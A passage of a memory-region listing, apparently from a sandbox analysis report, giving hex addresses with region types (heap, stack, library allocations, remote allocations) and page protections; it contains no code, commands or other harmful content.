page read and write
7FF848FD3000
trusted library allocation
page read and write
1BF47000
heap
page read and write
22264B3C000
heap
page read and write
3D0000
heap
page read and write
7FF848FB0000
trusted library allocation
page read and write
22264A99000
heap
page read and write
22707B63000
heap
page execute and read and write
668BEFB000
stack
page read and write
2226535D000
heap
page read and write
56E000
stack
page read and write
2226537F000
heap
page read and write
7FF84903E000
trusted library allocation
page read and write
14CE000
heap
page read and write
7FF848EC0000
trusted library allocation
page read and write
14E4000
heap
page read and write
7FF8490F0000
trusted library allocation
page read and write
222651A0000
remote allocation
page read and write
7FF849001000
trusted library allocation
page read and write
1C5CAC13000
unkown
page read and write
1B04E000
stack
page read and write
22717C61000
trusted library allocation
page read and write
22265378000
heap
page read and write
22264A8A000
heap
page read and write
22265AD7000
heap
page read and write
1946000
heap
page read and write
7FF8491E0000
trusted library allocation
page read and write
BC0000
unkown
page readonly
12CB000
heap
page read and write
22264B40000
heap
page read and write
22265393000
heap
page read and write
1E57F88C000
heap
page read and write
7FF848FC0000
trusted library allocation
page read and write
22708353000
trusted library allocation
page read and write
22705F3B000
heap
page read and write
830000
unkown
page readonly
22265379000
heap
page read and write
2226537A000
heap
page read and write
2270806A000
trusted library allocation
page read and write
7FF84905E000
trusted library allocation
page read and write
1E57F780000
heap
page read and write
1E58504E000
heap
page read and write
2226532C000
heap
page read and write
22264A8E000
heap
page read and write
1404B026000
heap
page read and write
7FF8491F0000
trusted library allocation
page read and write
B4D000
trusted library allocation
page execute and read and write
349D000
trusted library allocation
page read and write
22707F3B000
trusted library allocation
page read and write
22264AA7000
heap
page read and write
1C7B0000
heap
page read and write
22264B3C000
heap
page read and write
85844FE000
unkown
page readonly
1BE3E000
heap
page read and write
7DE000
heap
page read and write
22264B1B000
heap
page read and write
1E57F8A0000
heap
page read and write
184E000
heap
page read and write
1C5CAB40000
heap
page read and write
314E000
stack
page read and write
7FF849110000
trusted library allocation
page read and write
1E5850F1000
heap
page read and write
585E4FD000
stack
page read and write
7FF849170000
trusted library allocation
page read and write
B12000
trusted library allocation
page read and write
22265329000
heap
page read and write
770000
trusted library allocation
page read and write
7FF848FC0000
trusted library allocation
page read and write
668B7F9000
stack
page read and write
7FF8491A0000
trusted library allocation
page read and write
1BE4C000
heap
page read and write
7FF849100000
trusted library allocation
page read and write
7FF848E3B000
trusted library allocation
page execute and read and write
1E5850ED000
heap
page read and write
823000
heap
page read and write
22707B60000
heap
page execute and read and write
1420000
heap
page read and write
123F1000
trusted library allocation
page read and write
22265A32000
heap
page read and write
1E584D90000
trusted library allocation
page read and write
22264A8E000
heap
page read and write
22264B1B000
heap
page read and write
7FF849200000
trusted library allocation
page read and write
7FF848EDC000
trusted library allocation
page execute and read and write
2226535A000
heap
page read and write
668C7FB000
stack
page read and write
1410000
heap
page read and write
7FF849037000
trusted library allocation
page read and write
1BE3C000
heap
page read and write
22265B02000
heap
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
7FF8491F0000
trusted library allocation
page read and write
7FF849050000
trusted library allocation
page read and write
4160000
trusted library allocation
page read and write
1E580760000
trusted library section
page readonly
22265385000
heap
page read and write
BCD000
unkown
page readonly
B62000
trusted library allocation
page read and write
22265354000
heap
page read and write
2226536B000
heap
page read and write
2DCE000
stack
page read and write
32EF000
stack
page read and write
156C000
heap
page read and write
1E5850D6000
heap
page read and write
3A00000
trusted library allocation
page read and write
22264A81000
heap
page read and write
24E0000
heap
page execute and read and write
7FF849040000
trusted library allocation
page read and write
1BE4E000
heap
page read and write
1E580880000
trusted library allocation
page read and write
7FF848F40000
trusted library allocation
page execute and read and write
585D7FE000
stack
page read and write
22706040000
heap
page read and write
132FE000
trusted library allocation
page read and write
7FF849020000
trusted library allocation
page read and write
22265363000
heap
page read and write
7FF848EF6000
trusted library allocation
page execute and read and write
7FF848E02000
trusted library allocation
page read and write
1BD000
stack
page read and write
585D15F000
stack
page read and write
22265A00000
heap
page read and write
22721BE8000
heap
page read and write
10AE000
stack
page read and write
22265332000
heap
page read and write
2270800C000
trusted library allocation
page read and write
585D8FB000
stack
page read and write
1C5CAD02000
trusted library allocation
page read and write
7FF848E4B000
trusted library allocation
page execute and read and write
14E7000
heap
page read and write
1BF3F000
stack
page read and write
152B000
heap
page read and write
1592000
heap
page read and write
CBE000
stack
page read and write
99E000
stack
page read and write
22707CF9000
trusted library allocation
page read and write
1577000
heap
page read and write
668BBFE000
unkown
page readonly
12411000
trusted library allocation
page read and write
22721B77000
heap
page read and write
7FF849080000
trusted library allocation
page read and write
22265378000
heap
page read and write
22265329000
heap
page read and write
2272079B000
heap
page read and write
47C000
stack
page read and write
7A8000
heap
page read and write
227204E4000
heap
page read and write
22265B3C000
heap
page read and write
841000
unkown
page read and write
22265ADE000
heap
page read and write
7FF848E03000
trusted library allocation
page read and write
12D6000
heap
page read and write
63D000
heap
page read and write
1C5CAD15000
trusted library allocation
page read and write
1E580750000
trusted library section
page readonly
7FF848FC0000
trusted library allocation
page read and write
3F90000
trusted library allocation
page read and write
157E000
stack
page read and write
2226537B000
heap
page read and write
2226532A000
heap
page read and write
22721B00000
heap
page read and write
4000000
trusted library allocation
page read and write
157A000
trusted library allocation
page read and write
7FF849180000
trusted library allocation
page read and write
1E584EC0000
trusted library allocation
page read and write
1C5CAD00000
trusted library allocation
page read and write
32F1000
trusted library allocation
page read and write
3D4E000
stack
page read and write
227082D4000
trusted library allocation
page read and write
7FF849090000
trusted library allocation
page read and write
1C7C4000
heap
page read and write
7FF848E4C000
trusted library allocation
page execute and read and write
D1C000
heap
page read and write
22264B3C000
heap
page read and write
4D2E000
stack
page read and write
668C3FE000
unkown
page readonly
520000
heap
page read and write
22720950000
heap
page read and write
828000
heap
page read and write
1E584D90000
trusted library allocation
page read and write
12F8000
heap
page read and write
3E8E000
stack
page read and write
22265AB9000
heap
page read and write
3750000
trusted library allocation
page read and write
2270802E000
trusted library allocation
page read and write
176F000
stack
page read and write
3FB0000
trusted library allocation
page read and write
1E58502C000
heap
page read and write
1A720FB000
stack
page read and write
37AB000
trusted library allocation
page read and write
85858FE000
unkown
page readonly
B34000
trusted library allocation
page read and write
3781000
trusted library allocation
page read and write
7FF849240000
trusted library allocation
page read and write
22721960000
heap
page read and write
CCA000
heap
page read and write
14F1000
heap
page read and write
22265B3C000
heap
page read and write
22721CE5000
heap
page read and write
830000
unkown
page readonly
14D6000
heap
page read and write
4010000
trusted library allocation
page read and write
841000
unkown
page write copy
7FF8491BA000
trusted library allocation
page read and write
22265A86000
heap
page read and write
1E580790000
trusted library section
page readonly
227207D0000
heap
page read and write
7FF849180000
trusted library allocation
page read and write
22265378000
heap
page read and write
22721BC7000
heap
page read and write
22265378000
heap
page read and write
2226535C000
heap
page read and write
227240A9000
heap
page read and write
7FF848DFD000
trusted library allocation
page execute and read and write
227081D8000
trusted library allocation
page read and write
22265B14000
heap
page read and write
22721B80000
heap
page read and write
22265ACB000
heap
page read and write
39F0000
trusted library allocation
page read and write
7FF849230000
trusted library allocation
page execute and read and write
22706000000
heap
page read and write
22707F47000
trusted library allocation
page read and write
13300000
trusted library allocation
page read and write
7FF848FA3000
trusted library allocation
page read and write
22265395000
heap
page read and write
22264B1B000
heap
page read and write
222649A0000
heap
page read and write
7FF849140000
trusted library allocation
page read and write
22264AAD000
heap
page read and write
7FF849010000
trusted library allocation
page read and write
7FF848E14000
trusted library allocation
page read and write
7FF849010000
trusted library allocation
page read and write
1C5CB100000
heap
page read and write
1B219000
heap
page read and write
7C6000
heap
page read and write
1C312000
unkown
page readonly
990000
heap
page read and write
22265A04000
heap
page read and write
60B000
heap
page read and write
2271FC90000
trusted library allocation
page read and write
1BC15000
heap
page read and write
133BF000
trusted library allocation
page read and write
22264A7D000
heap
page read and write
7FF8490C0000
trusted library allocation
page read and write
1E57F85B000
heap
page read and write
C3E000
stack
page read and write
22264B1B000
heap
page read and write
252D000
trusted library allocation
page read and write
7FF848E10000
trusted library allocation
page read and write
1E584EB0000
trusted library allocation
page read and write
77A000
heap
page read and write
21F7000
trusted library allocation
page read and write
7FF848E30000
trusted library allocation
page read and write
7FF848E00000
trusted library allocation
page read and write
7FF848FC5000
trusted library allocation
page read and write
7FF848EC6000
trusted library allocation
page read and write
85842FE000
unkown
page readonly
1BF4A000
heap
page read and write
516A000
stack
page read and write
2272054E000
heap
page read and write
3100000
trusted library section
page read and write
22721BBB000
heap
page read and write
7FF848E0D000
trusted library allocation
page execute and read and write
1AE4E000
stack
page read and write
7FF8491B0000
trusted library allocation
page read and write
1B87D000
stack
page read and write
1E585000000
heap
page read and write
FE0000
heap
page read and write
147E000
stack
page read and write
7FF8491C0000
trusted library allocation
page read and write
22265ADD000
heap
page read and write
BD6000
unkown
page readonly
1BBDA000
heap
page read and write
1BC2F000
heap
page read and write
8584B7E000
stack
page read and write
22706020000
heap
page read and write
7FF848DF4000
trusted library allocation
page read and write
22265380000
heap
page read and write
2510000
trusted library allocation
page read and write
22708452000
trusted library allocation
page read and write
B1B000
trusted library allocation
page execute and read and write
22707A60000
heap
page read and write
21F1000
trusted library allocation
page read and write
222649D0000
trusted library allocation
page read and write
22265ADA000
heap
page read and write
85845FE000
unkown
page readonly
1E585102000
heap
page read and write
7FF848EA0000
trusted library allocation
page read and write
7FF849083000
trusted library allocation
page read and write
22264B13000
heap
page read and write
22265A0A000
heap
page read and write
1440000
heap
page read and write
22723FB5000
heap
page read and write
1E57F7A0000
heap
page read and write
22265180000
remote allocation
page read and write
22705F00000
heap
page read and write
22717F42000
trusted library allocation
page read and write
22705E10000
heap
page read and write
22264A27000
heap
page read and write
22265AFB000
heap
page read and write
24C2000
unkown
page readonly
7FF848FF0000
trusted library allocation
page read and write
22265357000
heap
page read and write
222651A0000
remote allocation
page read and write
51BE000
stack
page read and write
22265340000
heap
page read and write
85843FB000
stack
page read and write
B20000
trusted library allocation
page read and write
1BE46000
heap
page read and write
668BFFE000
unkown
page readonly
746000
heap
page read and write
83B000
unkown
page readonly
1E58500F000
heap
page read and write
B50000
trusted library allocation
page read and write
1E580102000
heap
page read and write
22265352000
heap
page read and write
22265B00000
heap
page read and write
22264B1B000
heap
page read and write
7FF849137000
trusted library allocation
page read and write
BC1000
unkown
page execute read
7FF849030000
trusted library allocation
page read and write
22264B3C000
heap
page read and write
2226535A000
heap
page read and write
CD8000
stack
page read and write
71C000
heap
page read and write
1E58510A000
heap
page read and write
1E57F82B000
heap
page read and write
22708125000
trusted library allocation
page read and write
22265395000
heap
page read and write
22264B1B000
heap
page read and write
1E580301000
trusted library allocation
page read and write
7FF848FC8000
trusted library allocation
page read and write
22265374000
heap
page read and write
1BC79000
heap
page read and write
22721987000
heap
page read and write
8584DFE000
stack
page read and write
1BD70000
heap
page read and write
7FF848FD7000
trusted library allocation
page read and write
1E584DA0000
trusted library allocation
page read and write
22265B2C000
heap
page read and write
7FF848EAC000
trusted library allocation
page execute and read and write
9D3000
trusted library allocation
page execute and read and write
1C0D0000
unkown
page readonly
1404B002000
heap
page read and write
2270816E000
trusted library allocation
page read and write
F91000
stack
page read and write
32B0000
trusted library allocation
page read and write
1BF40000
heap
page read and write
1E585041000
heap
page read and write
3FE0000
trusted library allocation
page read and write
22265A06000
heap
page read and write
7FF848FB0000
trusted library allocation
page read and write
3940000
trusted library allocation
page read and write
783000
trusted library allocation
page read and write
1E584D61000
trusted library allocation
page read and write
22264AF7000
heap
page read and write
2E40000
heap
page read and write
7FF849070000
trusted library allocation
page read and write
22265380000
heap
page read and write
377E000
trusted library allocation
page read and write
1590000
trusted library allocation
page read and write
825000
heap
page read and write
668C5FE000
unkown
page readonly
BB0000
trusted library allocation
page read and write
1E57F878000
heap
page read and write
22265AB3000
heap
page read and write
22706290000
trusted library allocation
page read and write
7FF8490A9000
trusted library allocation
page read and write
1BD7C000
heap
page read and write
7FF849160000
trusted library allocation
page read and write
22707F97000
trusted library allocation
page read and write
1E57F813000
heap
page read and write
1BBD0000
heap
page read and write
17C0000
heap
page read and write
1C5CB102000
heap
page read and write
7DB000
heap
page read and write
7FF848EA6000
trusted library allocation
page read and write
7FF848E23000
trusted library allocation
page execute and read and write
7FF849190000
trusted library allocation
page read and write
22720552000
heap
page read and write
7FF848E1B000
trusted library allocation
page execute and read and write
22265357000
heap
page read and write
1E584D60000
trusted library allocation
page read and write
7FF84904E000
trusted library allocation
page read and write
2272053E000
heap
page read and write
15AF000
stack
page read and write
7E8000
heap
page read and write
222651A0000
remote allocation
page read and write
1E57F929000
heap
page read and write
7FF849160000
trusted library allocation
page read and write
7FF848FDC000
trusted library allocation
page read and write
1E5850F6000
heap
page read and write
22721CD9000
heap
page read and write
7FF8490B5000
trusted library allocation
page read and write
22265355000
heap
page read and write
4150000
trusted library allocation
page read and write
1460000
heap
page read and write
3950000
trusted library allocation
page read and write
1E580000000
heap
page read and write
22265AD7000
heap
page read and write
389A000
trusted library allocation
page read and write
1505000
heap
page read and write
132F1000
trusted library allocation
page read and write
1563000
heap
page read and write
8F0000
trusted library section
page read and write
1BC56000
heap
page read and write
10E0000
heap
page execute and read and write
22265AB1000
heap
page read and write
8584C7E000
stack
page read and write
1843000
heap
page read and write
1E5850FB000
heap
page read and write
7FF849015000
trusted library allocation
page read and write
22265B0E000
heap
page read and write
7FF849030000
trusted library allocation
page execute and read and write
700000
heap
page read and write
1BE48000
heap
page read and write
1BBE1000
heap
page read and write
3920000
trusted library allocation
page read and write
22265359000
heap
page read and write
22264B1B000
heap
page read and write
1C5CB000000
heap
page read and write
7FF849010000
trusted library allocation
page read and write
22265AA4000
heap
page read and write
1E584E30000
trusted library allocation
page read and write
1BCAE000
stack
page read and write
14A0000
heap
page read and write
AFE000
stack
page read and write
1404B013000
heap
page read and write
22265359000
heap
page read and write
492B000
stack
page read and write
22706080000
trusted library allocation
page read and write
4A90000
heap
page execute and read and write
7FF849070000
trusted library allocation
page read and write
7FF849040000
trusted library allocation
page read and write
1B211000
heap
page read and write
1C8D0000
heap
page read and write
22265357000
heap
page read and write
22265AD7000
heap
page read and write
22264A13000
heap
page read and write
1BE13000
heap
page read and write
1E580015000
heap
page read and write
22265ADA000
heap
page read and write
22707A50000
heap
page read and write
7FF848E4C000
trusted library allocation
page execute and read and write
22265ABF000
heap
page read and write
585DDF4000
stack
page read and write
22707EC3000
trusted library allocation
page read and write
12FC000
heap
page read and write
22265AE1000
heap
page read and write
1404AE50000
heap
page read and write
22705FF0000
heap
page read and write
3910000
trusted library allocation
page execute and read and write
980000
heap
page read and write
22265330000
heap
page read and write
1C5CB113000
heap
page read and write
22721B9A000
heap
page read and write
9D0000
trusted library allocation
page read and write
7FF848F10000
trusted library allocation
page execute and read and write
585E5FE000
stack
page read and write
22707A20000
heap
page read and write
1BBC0000
heap
page read and write
22264ADF000
heap
page read and write
7FF848F91000
trusted library allocation
page read and write
BD4000
unkown
page write copy
278D000
trusted library allocation
page read and write
22264A8A000
heap
page read and write
7FF849110000
trusted library allocation
page read and write
1E57F8B3000
heap
page read and write
85841FB000
stack
page read and write
22265B2B000
heap
page read and write
22265354000
heap
page read and write
46DE000
stack
page read and write
FF0000
unkown
page readonly
227082BC000
trusted library allocation
page read and write
22264A8F000
heap
page read and write
6A0000
heap
page read and write
3710000
trusted library allocation
page read and write
585E6FE000
stack
page read and write
22265331000
heap
page read and write
3762000
trusted library allocation
page read and write
8583CFE000
unkown
page readonly
22707CF1000
trusted library allocation
page read and write
22720770000
heap
page read and write
1BC6C000
heap
page read and write
1E585114000
heap
page read and write
1C5CAB60000
heap
page read and write
7FF849150000
trusted library allocation
page read and write
22265AD7000
heap
page read and write
1C25E000
stack
page read and write
22265393000
heap
page read and write
7FF8491D0000
trusted library allocation
page read and write
22265AD3000
heap
page read and write
1BD30000
heap
page read and write
22721B6C000
heap
page read and write
22707F54000
trusted library allocation
page read and write
14ED000
heap
page read and write
1E584DD0000
trusted library allocation
page read and write
227082DC000
trusted library allocation
page read and write
1404B802000
trusted library allocation
page read and write
8DC000
stack
page read and write
1C7C7000
heap
page read and write
1C03F000
stack
page read and write
22721B6F000
heap
page read and write
1C5CB113000
heap
page read and write
990000
heap
page read and write
11C4000
stack
page read and write
22265359000
heap
page read and write
8583DFA000
stack
page read and write
1E57F7E0000
trusted library allocation
page read and write
1940000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
1BE90000
heap
page read and write
1B18F000
heap
page read and write
22723FAE000
heap
page read and write
1E586000000
heap
page read and write
5170000
trusted library allocation
page read and write
22264A00000
heap
page read and write
304F000
stack
page read and write
227240A0000
heap
page read and write
73E000
stack
page read and write
1B20D000
heap
page read and write
22721998000
heap
page read and write
1E584F00000
remote allocation
page read and write
7FF848ED0000
trusted library allocation
page execute and read and write
78D000
heap
page read and write
7FF848ECC000
trusted library allocation
page execute and read and write
5550000
trusted library allocation
page execute and read and write
22265359000
heap
page read and write
7FF848E23000
trusted library allocation
page read and write
7FF8491A5000
trusted library allocation
page read and write
1E580CD0000
trusted library allocation
page read and write
907000
heap
page read and write
7FF8492E0000
trusted library allocation
page execute and read and write
1E584E40000
trusted library allocation
page read and write
1BC96000
heap
page read and write
22721B7B000
heap
page read and write
4F38000
heap
page read and write
1BE3E000
stack
page read and write
1E585054000
heap
page read and write
2F4F000
stack
page read and write
123FE000
trusted library allocation
page read and write
37B0000
trusted library allocation
page read and write
1E585100000
heap
page read and write
7FF849250000
trusted library allocation
page execute and read and write
1944000
heap
page read and write
2226532B000
heap
page read and write
22265B1B000
heap
page read and write
1337000
heap
page read and write
1C5CB100000
heap
page read and write
843000
unkown
page readonly
2226532D000
heap
page read and write
132FD000
trusted library allocation
page read and write
1BBDD000
heap
page read and write
24AF000
trusted library allocation
page read and write
1C5CAD24000
heap
page read and write
22265380000
heap
page read and write
227060D5000
heap
page read and write
1A4E000
stack
page read and write
1589000
heap
page read and write
4E2D000
stack
page read and write
22265357000
heap
page read and write
1339000
heap
page read and write
227207C2000
heap
page read and write
23E0000
heap
page read and write
22721C1D000
heap
page read and write
7FF849220000
trusted library allocation
page read and write
22265313000
heap
page read and write
7FF848DF3000
trusted library allocation
page execute and read and write
22265A84000
heap
page read and write
22265337000
heap
page read and write
1A72D7E000
unkown
page readonly
7FF8490C0000
trusted library allocation
page read and write
22707CF5000
trusted library allocation
page read and write
132FF000
trusted library allocation
page read and write
1E584CE0000
trusted library allocation
page read and write
7FF849200000
trusted library allocation
page read and write
7FF8492D0000
trusted library allocation
page read and write
22265380000
heap
page read and write
2272079E000
heap
page read and write
1E584F00000
remote allocation
page read and write
22720542000
heap
page read and write
22707C20000
heap
page read and write
1C5CAC37000
heap
page read and write
4FD000
stack
page read and write
9F0000
heap
page read and write
22264B4D000
heap
page read and write
22707F4C000
trusted library allocation
page read and write
7FF84900B000
trusted library allocation
page read and write
BD4000
unkown
page read and write
1B1F7000
heap
page read and write
2226535D000
heap
page read and write
2226537A000
heap
page read and write
7FF849147000
trusted library allocation
page read and write
1E584EB0000
trusted library allocation
page read and write
8584A7E000
stack
page read and write
3720000
trusted library allocation
page read and write
585E0FE000
stack
page read and write
32E0000
heap
page execute and read and write
11EE000
stack
page read and write
7FF848FB0000
trusted library allocation
page read and write
2226535C000
heap
page read and write
585E2FD000
stack
page read and write
1B758000
stack
page read and write
1A7277E000
unkown
page readonly
7FF849000000
trusted library allocation
page read and write
668C2FE000
stack
page read and write
787000
heap
page read and write
7FF848FDF000
trusted library allocation
page read and write
9DE000
stack
page read and write
81C000
stack
page read and write
1E584F00000
remote allocation
page read and write
7FF8492C0000
trusted library allocation
page read and write
1C5CAB70000
trusted library allocation
page read and write
1C7AD000
stack
page read and write
22265352000
heap
page read and write
2226535B000
heap
page read and write
7FF8490B9000
trusted library allocation
page read and write
22720794000
heap
page read and write
2652000
trusted library allocation
page read and write
4A30000
trusted library allocation
page read and write
1378000
heap
page read and write
15A8000
trusted library allocation
page read and write
22707E58000
trusted library allocation
page read and write
22265330000
heap
page read and write
22264AA7000
heap
page read and write
12F0000
heap
page read and write
1404AE30000
heap
page read and write
1B270000
trusted library allocation
page read and write
22721BF5000
heap
page read and write
14A9000
heap
page read and write
7FF849040000
trusted library allocation
page read and write
7FF849196000
trusted library allocation
page read and write
85840FE000
unkown
page readonly
1840000
heap
page read and write
22265AF8000
heap
page read and write
7FF848F30000
trusted library allocation
page execute and read and write
71B000
stack
page read and write
22707C61000
trusted library allocation
page read and write
22708442000
trusted library allocation
page read and write
7FF849020000
trusted library allocation
page read and write
7FF848E0D000
trusted library allocation
page execute and read and write
22265376000
heap
page read and write
3880000
trusted library allocation
page read and write
22264A99000
heap
page read and write
1E57F7F0000
trusted library section
page read and write
B7E000
stack
page read and write
B67000
trusted library allocation
page execute and read and write
22265384000
heap
page read and write
7FF848E34000
trusted library allocation
page read and write
1B856000
stack
page read and write
22265354000
heap
page read and write
22265AE1000
heap
page read and write
22707E5A000
trusted library allocation
page read and write
1BBEE000
heap
page read and write
1E57F890000
heap
page read and write
B33000
trusted library allocation
page execute and read and write
22265332000
heap
page read and write
140E000
trusted library allocation
page read and write
1850000
unkown
page readonly
1B1B9000
heap
page read and write
1E57F87B000
heap
page read and write
1E584E90000
trusted library allocation
page read and write
9E0000
trusted library allocation
page read and write
7FF848E00000
trusted library allocation
page read and write
3130000
heap
page execute and read and write
22264AB2000
heap
page read and write
585D9FE000
stack
page read and write
22265AC3000
heap
page read and write
227060D0000
heap
page read and write
22708195000
trusted library allocation
page read and write
22265380000
heap
page read and write
7FF848E7C000
trusted library allocation
page execute and read and write
22265382000
heap
page read and write
7FF848DF4000
trusted library allocation
page read and write
3795000
trusted library allocation
page read and write
2226535D000
heap
page read and write
22721BDC000
heap
page read and write
1A7297E000
unkown
page readonly
22264B3C000
heap
page read and write
1A7267D000
stack
page read and write
12B0000
heap
page read and write
585E3FD000
stack
page read and write
1B280000
trusted library allocation
page read and write
227207C4000
heap
page read and write
B6B000
trusted library allocation
page execute and read and write
22720763000
heap
page read and write
22264970000
heap
page read and write
158C000
trusted library allocation
page read and write
7FF849060000
trusted library allocation
page read and write
22265B2C000
heap
page read and write
410D000
stack
page read and write
22265AE0000
heap
page read and write
22265AD7000
heap
page read and write
2270838D000
trusted library allocation
page read and write
AD5000
heap
page read and write
22265329000
heap
page read and write
4CEB000
stack
page read and write
7FF848FE0000
trusted library allocation
page read and write
9C0000
trusted library allocation
page read and write
1910000
heap
page read and write
22265A36000
heap
page read and write
60E000
heap
page read and write
1E5850BE000
heap
page read and write
FBE000
stack
page read and write
7FF848FAE000
trusted library allocation
page read and write
183F000
stack
page read and write
22265B20000
heap
page read and write
22708459000
trusted library allocation
page read and write
22265AD7000
heap
page read and write
FF2000
unkown
page readonly
1C5CB102000
heap
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
7FF848FD9000
trusted library allocation
page read and write
7FF848E33000
trusted library allocation
page read and write
1AF4F000
stack
page read and write
1594000
trusted library allocation
page read and write
7FF849220000
trusted library allocation
page read and write
1A97D000
stack
page read and write
414D000
stack
page read and write
1E57F8AE000
heap
page read and write
4F30000
heap
page read and write
2226535A000
heap
page read and write
668BAFC000
stack
page read and write
B56000
trusted library allocation
page execute and read and write
22265374000
heap
page read and write
22265A67000
heap
page read and write
7FF848ED6000
trusted library allocation
page execute and read and write
1E57F843000
heap
page read and write
6D0000
heap
page read and write
22721C03000
heap
page read and write
7FF848F06000
trusted library allocation
page execute and read and write
22721CD1000
heap
page read and write
13A4000
heap
page read and write
22265375000
heap
page read and write
22265357000
heap
page read and write
2226537D000
heap
page read and write
649000
heap
page read and write
22265375000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
2226535F000
heap
page read and write
7FF848DF3000
trusted library allocation
page execute and read and write
3890000
trusted library allocation
page read and write
22265300000
heap
page read and write
22265359000
heap
page read and write
1630000
heap
page read and write
7FF848FE6000
trusted library allocation
page read and write
2226535A000
heap
page read and write
22265B2B000
heap
page read and write
3766000
trusted library allocation
page read and write
22721C6C000
heap
page read and write
22708028000
trusted library allocation
page read and write
7FF848E44000
trusted library allocation
page read and write
22265880000
remote allocation
page read and write
24C0000
unkown
page readonly
8583BFE000
stack
page read and write
12428000
trusted library allocation
page read and write
1A72B7E000
unkown
page readonly
7FF405150000
trusted library allocation
page execute and read and write
22265ADD000
heap
page read and write
1A72C7C000
stack
page read and write
22265AA0000
heap
page read and write
22707F3F000
trusted library allocation
page read and write
7FF849050000
trusted library allocation
page read and write
22705F4B000
heap
page read and write
22265376000
heap
page read and write
3160000
heap
page read and write
7FF848FE0000
trusted library allocation
page read and write
22265352000
heap
page read and write
39B0000
unkown
page readonly
17E0000
heap
page execute and read and write
1280000
trusted library allocation
page read and write
1E580100000
heap
page read and write
7FF848EE0000
trusted library allocation
page execute and read and write
7FF848DF0000
trusted library allocation
page read and write
4AAE000
stack
page read and write
7FF848E3D000
trusted library allocation
page execute and read and write
7FF848E2D000
trusted library allocation
page execute and read and write
858367B000
stack
page read and write
585E1FE000
stack
page read and write
7FF849120000
trusted library allocation
page read and write
6E0000
heap
page read and write
7FF848F99000
trusted library allocation
page read and write
22264A5E000
heap
page read and write
7FF849010000
trusted library allocation
page read and write
22721CC9000
heap
page read and write
7FF848FD5000
trusted library allocation
page read and write
2D8E000
stack
page read and write
AC3000
heap
page execute and read and write
32CE000
stack
page read and write
7FF849054000
trusted library allocation
page read and write
B60000
trusted library allocation
page read and write
7FF848FD0000
trusted library allocation
page read and write
1E57F872000
heap
page read and write
1B1FE000
heap
page read and write
B02000
trusted library allocation
page read and write
7FF849006000
trusted library allocation
page read and write
1E58501F000
heap
page read and write
22265A03000
heap
page read and write
1BB4D000
stack
page read and write
7FF848FC0000
trusted library allocation
page read and write
3FA0000
trusted library allocation
page execute and read and write
7FF849240000
trusted library allocation
page execute and read and write
7FF849100000
trusted library allocation
page read and write
7FF848FD0000
trusted library allocation
page read and write
1E580113000
heap
page read and write
14B5000
heap
page read and write
22265378000
heap
page read and write
22265A97000
heap
page read and write
22265378000
heap
page read and write
227207CA000
heap
page read and write
7FF8491B3000
trusted library allocation
page read and write
7FF849047000
trusted library allocation
page read and write
668C8FE000
unkown
page readonly
7FF848E24000
trusted library allocation
page read and write
227240BD000
heap
page read and write
BBE000
stack
page read and write
7FF8491B0000
trusted library allocation
page read and write
157A000
heap
page read and write
14A0000
heap
page read and write
22723FA6000
heap
page read and write
22265356000
heap
page read and write
22265A66000
heap
page read and write
33A7000
trusted library allocation
page read and write
7FF848EA6000
trusted library allocation
page read and write
3937000
trusted library allocation
page read and write
227081B8000
trusted library allocation
page read and write
1E57F913000
heap
page read and write
7FF848ED6000
trusted library allocation
page read and write
1404B102000
heap
page read and write
22707C50000
heap
page execute and read and write
22264AAD000
heap
page read and write
3FC0000
trusted library allocation
page read and write
4A6C000
stack
page read and write
A07000
heap
page read and write
22265357000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
22264990000
heap
page read and write
10C0000
heap
page execute and read and write
7FF8490D0000
trusted library allocation
page read and write
3541000
trusted library allocation
page read and write
7FF8490B0000
trusted library allocation
page read and write
22721B41000
heap
page read and write
C7E000
stack
page read and write
7FF8491E0000
trusted library allocation
page read and write
2226533B000
heap
page read and write
EBE000
stack
page read and write
7FF848FD0000
trusted library allocation
page read and write
3FF0000
trusted library allocation
page execute and read and write
12A0000
trusted library allocation
page read and write
4170000
trusted library allocation
page read and write
22724041000
heap
page read and write
63A000
heap
page read and write
85839F7000
stack
page read and write
22264B3B000
heap
page read and write
1BBAE000
stack
page read and write
1404B02B000
heap
page read and write
22264AA7000
heap
page read and write
1404AF60000
trusted library allocation
page read and write
83B000
unkown
page readonly
585D113000
stack
page read and write
22265A69000
heap
page read and write
158A000
trusted library allocation
page read and write
1E58011B000
heap
page read and write
95E000
stack
page read and write
12E3000
trusted library allocation
page read and write
668C1FE000
unkown
page readonly
1E584D60000
trusted library allocation
page read and write
22265A89000
heap
page read and write
B90000
heap
page read and write
227084B4000
trusted library allocation
page read and write
32F1000
trusted library allocation
page read and write
227082C5000
trusted library allocation
page read and write
858457E000
stack
page read and write
668BCF8000
stack
page read and write
7FF8491D0000
trusted library allocation
page read and write
3290000
heap
page execute and read and write
1846000
heap
page read and write
CCE000
heap
page read and write
668B9FE000
unkown
page readonly
7FF848E1D000
trusted library allocation
page execute and read and write
668B97E000
stack
page read and write
22265393000
heap
page read and write
123FC000
trusted library allocation
page read and write
4B32000
unkown
page readonly
22265382000
heap
page read and write
7FF848DF2000
trusted library allocation
page read and write
89E000
stack
page read and write
22723FC2000
heap
page read and write
1404B038000
heap
page read and write
1410000
trusted library allocation
page read and write
900000
heap
page read and write
8584BFE000
unkown
page readonly
227082D8000
trusted library allocation
page read and write
227082C8000
trusted library allocation
page read and write
22265AB6000
heap
page read and write
8584AFE000
unkown
page readonly
227207AF000
heap
page read and write
22265A69000
heap
page read and write
12F6000
heap
page read and write
22265202000
heap
page read and write
7FF849060000
trusted library allocation
page read and write
4BAC000
stack
page read and write
85850FE000
unkown
page readonly
22265330000
heap
page read and write
37B1000
trusted library allocation
page read and write
22717CC9000
trusted library allocation
page read and write
668C4FC000
stack
page read and write
4B30000
unkown
page readonly
7FF848F95000
trusted library allocation
page read and write
7FF849044000
trusted library allocation
page read and write
22721BA4000
heap
page read and write
22720750000
heap
page read and write
570000
heap
page read and write
3A10000
trusted library allocation
page read and write
5540000
heap
page read and write
22721BBE000
heap
page read and write
585DAF8000
stack
page read and write
7FF8490B1000
trusted library allocation
page read and write
780000
trusted library allocation
page read and write
7A0000
heap
page read and write
22265379000
heap
page read and write
326D000
stack
page read and write
668B8FE000
unkown
page readonly
22265AFA000
heap
page read and write
7FF8491A0000
trusted library allocation
page read and write
858477E000
stack
page read and write
9E0000
heap
page read and write
157E000
trusted library allocation
page read and write
585DBFD000
stack
